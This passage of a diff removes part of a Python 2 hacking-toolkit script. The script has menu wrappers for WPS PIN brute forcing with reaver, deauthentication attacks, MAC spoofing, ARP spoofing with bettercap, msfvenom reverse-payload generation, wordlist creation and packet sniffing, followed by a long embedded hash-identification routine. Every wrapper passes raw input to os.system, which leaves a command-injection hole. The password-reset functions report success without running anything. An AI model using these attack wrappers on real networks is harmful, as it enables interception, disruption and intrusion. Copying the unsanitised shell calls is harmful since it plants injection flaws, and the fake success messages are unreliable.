BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 